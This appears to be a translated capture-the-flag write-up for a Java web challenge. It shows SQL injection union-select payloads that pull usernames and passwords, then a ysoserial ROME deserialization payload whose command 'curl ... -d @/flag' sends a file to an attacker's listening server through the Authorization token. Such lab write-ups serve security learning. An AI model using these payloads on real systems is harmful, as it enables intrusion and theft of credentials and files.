Open the topic attachment
It is speculated that it is related to sql injection, open sqldict.class, and find the code to connect to the database and the database query statement
Start to start, burp captures the packet, and sends it to the repeater
Here is the request address, add the request, and add the injection code in combination with the code
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = 'myapp?a=' union select 1#' and table_name='" + TableName
//表名user 最终判断出id ,name,pwd
myapp?a=' union select (select name from user)#
myapp?a=' union select (select pwd from user)#
get name, pwd
The code also introduces a package import io.swagger.annotations.ApiOperation;
Swagger
Swagger is a specification and complete framework for generating, describing, invoking and visualizing RESTful web services. The overall goal is to have the client and the filesystem update at the same rate as the server. Documenting methods, parameters and models is tightly integrated into the server-side code, allowing the API to always stay in sync.
Swagger UI provides a visual UI page display description file. Interface callers, testers, project managers, etc. can view related interfaces and make some simple interface requests on this page. The project supports online import of description files and local deployment of UI projects.
Visit url: /swagger-ui.html
Open the topic address page for interface testing
Test login on this interface, try it out
Return data, starting with rO0AB, serialized in java, submitted at identity authentication
Returned user login success
The new version uses b = base64.b64decode(a).hex() to replace the above b=
SerializationDumper is a tool corresponding to ysoserial, used to parse data
Download: Releases NickstaDB/SerializationDumper GitHub
analyze
It is equivalent to base64 decrypting the token data of the server first, and then deserializing it
to attack
What you can see is the ctfhub account name in the return packet, which means that the account name is deserialized to get the value
The reason for the vulnerability is that when viewing the current user information, the request data packet is returned
attack ysoserial
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl xx.xx.xx.xx:xxxx -d @/flag" > xiaodi.bin
//xx.xx.xx.xx:xxxx 服务器ip加一会监听的端口
Rome is an open source package developed for RSS feeds
Generate a bin file, perform base64 encryption, and change the name of the file
After running, capture the packet and enter the printed information in Authorization to go
local server listening